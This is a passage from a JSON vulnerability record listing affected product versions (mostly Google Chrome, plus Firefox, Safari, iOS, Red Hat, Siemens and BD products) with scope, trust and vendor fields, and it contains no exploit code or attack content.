"13.0.782.20" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.59" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1039.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.836.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.23" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.14" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.1" }, { "model": "lsrfortessa", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "x-200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.591.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "45.0.2454.101" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.107" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.168" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "8.0.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.278.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.413.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.580.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.146" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.513.0" }, { "model": "enterprise linux server extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.29" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.30" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1042" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.158.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.1" }, { "model": "windows server r2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20120" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.30" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.45" }, { "model": "sinumerik pcu", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "50.5" }, { "model": "enterprise linux for ibm z systems", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.765.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.100" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "26.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.53" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.553.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.494.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.745.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.484.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.829.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.482.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.32" }, { "model": "windows version for 32-bit systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "1015110" }, { "model": "totalys multiprocessor", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.76" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "56" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.14" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "sql server for x64-based systems", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20170" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "46.0.2490.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.677.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0.2526.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.770.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.30" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "53" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64.0.3282.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.364.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "47.0.2526.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.349.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.17" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "58.0.3029.96" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.63" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1297.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1026" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.53" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.33" }, { "model": "simatic ipc627d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.1" }, { "model": "simatic ipc427c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.1" }, { "model": "enterprise linux server year extended upd", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-47.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.884.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1038" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.621.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.310" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1006" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.811.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.709.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.882.0" }, { "model": "alaris systems manager", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3112.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.384.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.2" }, { "model": "simatic hmi ktp mobile panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.76" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.563.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.750.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.24" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.193.2" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.771.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.43" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "44.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.8" }, { "model": "enterprise linux for power little endian extended update supp", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.114" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.202" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.363.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.60" }, { "model": "simatic ipc547e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.601.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.52" }, { "model": "panel designer", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.812.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.944.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "57.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.635.0" }, { "model": "simatic s7-1518f-4 pn/dp odk", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.96" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1660.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1047.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.44" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.473.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.441.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1040" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1037.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.115" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "32.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.104" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.53" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.0.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.426.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.752.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.43" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.33" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5x" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.834.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.327.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1654.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.49" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.112" }, { "model": "firefox", "scope": 